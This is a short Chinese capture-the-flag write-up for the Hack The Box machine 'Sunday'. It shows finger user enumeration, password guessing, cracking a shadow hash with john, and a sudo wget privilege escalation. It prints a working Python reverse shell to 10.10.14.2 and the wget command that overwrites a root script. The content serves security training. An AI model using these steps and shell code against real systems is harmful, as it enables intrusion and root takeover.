Sunday

nmap

sudo nmap -r -p- -vv -sV 10.10.10.76

79端口 finger

https://baike.baidu.com/item/finger%E6%9C%8D%E5%8A%A1/10976284?fr=aladdin

公开的漏洞信息中能够找到finger漏洞能够枚举ssh的用户名,因为又扫到了22022ssh服务,

找到一个枚举脚本

https://github.com/pentestmonkey/finger-user-enum

./finger-user-enum.pl -m 50 -U /usr/share/dnsrecon/subdomains-top1mil-20000.txt -t 10.10.10.76|less -S

这里注意到有两个用户,sunny和sammy记录了登录的IP地址,

经过尝试发现密码是题目名字,老套路了

sunny/sunday

提权

/root/troll 这个脚本写死了

发现备份文件 /backup/shadow.backup

使用john破解sammy密码,保存到文件sammy.txt

$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB

执行

john --wordlist=/usr/share/wordlists/rockyou.txt sammy.txt

得到sammy密码cooldude!

执行sudo -l 发现sunny免密执行/root/trollsammy免密执行root权限的/usr/bin/wget

通过wget覆盖/root/troll 即可获得root shell

shell

#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.2",2333))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

sammy

sudo wget -O /root/troll http://10.10.14.2/shell.py

sunny

#这里要执行快一点,有定时任务会快速覆盖这个文件

sudo /root/troll

获得shell

上一页
下一页